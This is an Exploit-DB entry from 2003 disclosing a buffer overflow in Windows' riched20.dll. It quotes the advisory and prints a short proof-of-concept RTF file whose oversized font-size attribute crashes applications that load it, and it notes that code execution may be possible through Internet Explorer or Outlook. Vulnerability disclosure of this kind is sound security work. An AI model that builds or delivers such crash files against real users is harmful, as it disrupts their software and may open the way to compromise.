Microsoft Windows XP/95/98/2000/NT 4.0 - 'Riched20.dll' Attribute Buffer Overflow

EDB-ID:

22255

CVE:

N/A

EDB Verified:

Author:

Jie Dong

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2003-02-17

Vulnerable App: 
source: https://www.securityfocus.com/bid/6874/info

The riched20.dll is vulnerable to a buffer overflow that results in the application calling the library to fail. By creating a Rich Text Format (RTF) file with more than 65536 bytes of data in an attribute, the buffer will be overrun.

Execution of arbitrary code may be possible.

RTF files may be opened automatically by Internet Explorer and Outlook.

** Some reports indicate that this vulnerability could not be reproduced on riched20.dll v.3.0 (5.30.23.1200) running on Windows NT or riched20.dll v.3.0 (5.30.23.1211) running on Windows XP. 

{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0
\fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services